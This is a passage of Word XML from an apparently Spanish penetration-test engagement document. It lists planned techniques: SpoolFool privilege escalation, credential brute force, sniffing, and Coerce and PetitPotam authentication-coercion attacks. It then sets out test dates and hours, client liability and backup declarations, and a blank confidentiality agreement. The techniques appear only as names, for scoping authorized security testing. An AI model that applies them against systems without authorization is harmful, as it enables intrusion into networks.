              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A2341E4" w14:textId="7DF21A3C" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>CVE-2022-21999 SpoolFool Privesc para escalada de privilegios.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="085F91E5" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E254F49" w14:textId="42FFDEF4" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Ataques de fuerza bruta a credenciales de dominio y locales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7373E79B" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="473911FD" w14:textId="6C086896" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Sniffing de red.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ADBF8C3" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F116EFF" w14:textId="42E38CFE" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Escalada de privilegios en general.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1114C1FA" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="745B4509" w14:textId="38C3B81F" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Coerce, es un script para escalada de credenciales que abusa del protocolo MS-DFSNM</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5A5A90" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="380BD5D7" w14:textId="54648094" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>PetitPotam, script para escalada de privilegios que abusa del protocolo MS-EFSRPC</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221B5131" w14:textId="77777777" w:rsidR="00E75945" w:rsidRDefault="00E75945" w:rsidP="00E75945">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65DE742A" w14:textId="48A9BF04" w:rsidR="00E75945" w:rsidRDefault="00E75945" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Ataques para conseguir acceso a las maquinas en general.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D65077" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02897BAD" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CED4CA7" w14:textId="77777777" w:rsidR="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="17" w:name="_Toc135575974"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Restricciones y conformidades</w:t>
            </w:r>
            <w:bookmarkEnd w:id="17"/>
          </w:p>
          <w:p w14:paraId="5119A9B6" w14:textId="0A8507CA" w:rsidR="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="001A5D1B">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="040BA971" w14:textId="572C2100" w:rsidR="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
            <w:r>
              <w:t>Restricciones</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C99ADEE" w14:textId="77777777" w:rsidR="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="001A5D1B">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B7F6F84" w14:textId="77777777" w:rsidR="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="001A5D1B">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Está autorizado a un periodo de prueba que abarca desde el 1 de mayo de 2023 hasta el 31 de mayo de 2023, ambos los dos incluidos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E5D818" w14:textId="77777777" w:rsidR="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="001A5D1B">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Las horas en que se realizarán las pruebas serán desde las 16:00 hasta las 00:00.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51383323" w14:textId="77777777" w:rsidR="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="001A5D1B">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FCC9F1A" w14:textId="4DCFB2FF" w:rsidR="001A5D1B" w:rsidRDefault="003401B4" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>De conformidad con la concesión de esta autorización el cliente declara:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CFF9213" w14:textId="77777777" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="007E4B4B">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="222E415B" w14:textId="3E74E496" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">El cliente dueño de los sistemas donde se realizará la prueba de penetración y el suscrito tienen la autoridad adecuada para llevar a cabo las actividades de verificación de seguridad del sistema. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CDA57F1" w14:textId="77777777" w:rsidR="008831B9" w:rsidRDefault="008831B9" w:rsidP="008831B9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A585B20" w14:textId="1AB9B2EB" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>El cliente ha creado una copia de seguridad completa de todos los sistemas dentro del ámbito de las pruebas de penetración, y se ha comprometido a que el sistema de copias de seguridad permitirá al cliente restaurar los sistemas</w:t>
            </w:r>
            <w:r w:rsidR="00316CB3">
              <w:t xml:space="preserve"> al</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> estado pre pentest.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F57CAA6" w14:textId="77777777" w:rsidR="008831B9" w:rsidRDefault="008831B9" w:rsidP="008831B9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F00089F" w14:textId="77777777" w:rsidR="008831B9" w:rsidRDefault="008831B9" w:rsidP="008831B9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46E1B8CB" w14:textId="6478094F" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>El servicio implica el uso necesario de técnicas diseñadas para detectar vulnerabilidades de seguridad, y que es posible identificar y eliminar todos los riesgos del uso de estas herramientas y técnicas, si esto no pudiera ser posible los siguientes puntos tratarán sobre este caso.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CB8F6C1" w14:textId="77777777" w:rsidR="008831B9" w:rsidRDefault="008831B9" w:rsidP="008831B9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E3062F5" w14:textId="67A4FE02" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>En el caso que se produjera algún tipo de problema como daño a los sistemas producidos por la incorrecta realización de las pruebas de pentesting, la empresa Alesander S.L correrá con los gastos de reparación.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DEC9E6" w14:textId="77777777" w:rsidR="008831B9" w:rsidRDefault="008831B9" w:rsidP="008831B9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C123742" w14:textId="77777777" w:rsidR="008831B9" w:rsidRDefault="008831B9" w:rsidP="008831B9">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="486D278B" w14:textId="649F9799" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>En el caso de interrupción de los sistemas de la red, no será problema pues la prueba de pentesting se realizará fuera de horario laboral para no entorpecer el trabajo, pero aun así en el caso de que ocurra algún problema la empresa Alesander S.L correrá con los gastos de reparación o perdida de dinero producida por la imposibilidad de realizar la actividad empresarial, por servicios o red caídos por un periodo superior a un día, mientras la prueba este vigente.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795B789F" w14:textId="21DA3DEC" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="007E4B4B">
            <w:pPr>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>Cualquier cambio en las limitaciones y condiciones descritas deberá realizarse por escrito y ser aceptados por las dos partes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70315575" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="007E4B4B">
            <w:pPr>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38F8B016" w14:textId="77777777" w:rsidR="007E4B4B" w:rsidRDefault="007E4B4B" w:rsidP="00332C9C"/>
          <w:p w14:paraId="7AFB8C77" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00332C9C"/>
          <w:p w14:paraId="3FFD2167" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00332C9C"/>
          <w:p w14:paraId="512E1D65" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00332C9C"/>
          <w:p w14:paraId="641959BA" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="00332C9C"/>
          <w:p w14:paraId="6E500CF0" w14:textId="1CDF0551" w:rsidR="00816670" w:rsidRDefault="00816670" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="18" w:name="_Toc135575975"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Acuerdo de confidencialidad</w:t>
            </w:r>
            <w:r w:rsidR="00332C9C">
              <w:t xml:space="preserve"> y secreto</w:t>
            </w:r>
            <w:bookmarkEnd w:id="18"/>
          </w:p>
          <w:p w14:paraId="46FCB49B" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRPr="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C"/>
          <w:p w14:paraId="46218832" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C"/>
          <w:p w14:paraId="29152CD2" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>En</w:t>
            </w:r>
            <w:r>
              <w:t>....................</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:t>......</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>de</w:t>
            </w:r>
            <w:r>
              <w:t>..........</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>de 20</w:t>
            </w:r>
            <w:r>
              <w:t>.......</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A1A586" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C"/>
          <w:p w14:paraId="400D4A35" w14:textId="4722B44B" w:rsidR="00332C9C" w:rsidRPr="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332C9C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>REUNIDOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4780BE0A" w14:textId="77777777" w:rsidR="001A5D1B" w:rsidRPr="001A5D1B" w:rsidRDefault="001A5D1B" w:rsidP="00332C9C"/>
          <w:p w14:paraId="19C11735" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:r>
              <w:t>D./Dª ............................................................................, mayor de edad, con domicilio en la C/........................................................... Nº........, Localidad........................................... Provincia.......................................... C.P.............. con D.N.I......................., y en representación de la compañía……………………. con CIF……………… y domicilio social en……………………………… y,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA41862" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:r>
              <w:t>D./Dª ............................................................................, mayor de edad, con domicilio en la C/........................................................... Nº........, Localidad........................................... Provincia.......................................... C.P.............. con D.N.I......................., y en representación de la compañía……………………. con CIF……………… y domicilio social en……………………………… y,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7548300E" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRPr="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332C9C">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Exponen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="427B132C" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRPr="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D687BB9" w14:textId="53711CD1" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Que ambas partes se reconocen capacidad jurídica suficiente para suscribir el presente documento.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B87A5E0" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C5F651C" w14:textId="201E760D" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Que ambas partes desean iniciar una relación negocial y de colaboración mutua a nivel empresarial.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12479AA9" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DD4A840" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52B6DB95" w14:textId="5AC73968" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Que durante la mencionada relación las partes intercambiarán o crearán información que están interesadas en regular su confidencialidad y secreto mediante las siguientes:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="792E92FF" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C12B8FF" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRPr="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332C9C">
              <w:rPr>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Condiciones</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054FEEA0" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRPr="00840B2A" w:rsidRDefault="00332C9C" w:rsidP="00332C9C"/>
          <w:p w14:paraId="66821763" w14:textId="77777777" w:rsidR="00332C9C" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:r>
              <w:t>Se considera información confidencial toda aquella información, ya sea técnica, financiera, comercial o de cualquier otro carácter, suministrada y divulgada por la empresa cliente a Alesander S.L en relación con el alcance del contrato, mediante cualquier tipo de soporte, tangible o intangible, actualmente conocido o que posibilite el estado de la técnica en el futuro (papel, informático) o de forma verbal.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7229DE50" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64"/>
          <w:p w14:paraId="68F7ED00" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="00CB6A64"/>
          <w:p w14:paraId="7BF8D86E" w14:textId="5726A8A3" w:rsidR="00CB6A64" w:rsidRPr="003C0870" w:rsidRDefault="00332C9C" w:rsidP="00332C9C">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C0870">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Obligaciones Alesander S.L</w:t>
            </w:r>
            <w:r w:rsidR="009C2B5A" w:rsidRPr="003C0870">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4711D1A1" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRPr="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="095ED02F" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:r>
              <w:t>Nada más recibir la información confidencial, Alesander S.L la mantendrá en estricta confidencialidad, la utilizará solamente en relación con las pruebas de alcance, no la revelará a una tercera parte sin el previo consentimiento escrito de la empresa cliente y solo podrá revelar dicha información confidencial a los empleados de la compañía o que tengan necesidad expresa de conocerla en relación con las pruebas contratadas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156563FB" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A"/>
          <w:p w14:paraId="6DB963E8" w14:textId="71EBFE40" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:r>
              <w:t>Alesander S.L no podrá copiar ni reproducir la información confidencial suministrada por la otra parte en formato o soporte alguno, excepto si ello fuera preciso con arreglo a lo previsto en el párrafo anterior. Toda copia o reproducción que se haga deberá contener el mismo sello, marca o leyenda que la original</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B905CAE" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="009C2B5A"/>
          <w:p w14:paraId="5A585762" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRPr="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="775D0E75" w14:textId="2040205F" w:rsidR="00CB6A64" w:rsidRPr="00010ADE" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00010ADE">
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Exclusiones:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DFF02E1" w14:textId="77777777" w:rsidR="003C0870" w:rsidRDefault="003C0870" w:rsidP="009C2B5A"/>
          <w:p w14:paraId="6165F48B" w14:textId="187836C1" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:r>
              <w:t>Las partes acuerdan que las obligaciones contenidas en este acuerdo no se aplicarán respecto a aquella información que</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F635C87" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A"/>
          <w:p w14:paraId="41E16D53" w14:textId="4B47B1AE" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Esté, o sea o llegue a ser público conocimiento sin mediar acto proveniente de Alesander S.L en contravención de los términos de este compromiso</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002BF188" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30DDA2DB" w14:textId="4B425871" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Deba ser difundida por imperativo de una disposición legal, contractual o judicial</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41BD8B18" w14:textId="77777777" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F8DF049" w14:textId="1B70A3A3" w:rsidR="009C2B5A" w:rsidRDefault="009C2B5A" w:rsidP="009C2B5A">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Si la información es constitutiva de delito</w:t>
            </w:r>
            <w:r w:rsidR="00010ADE">
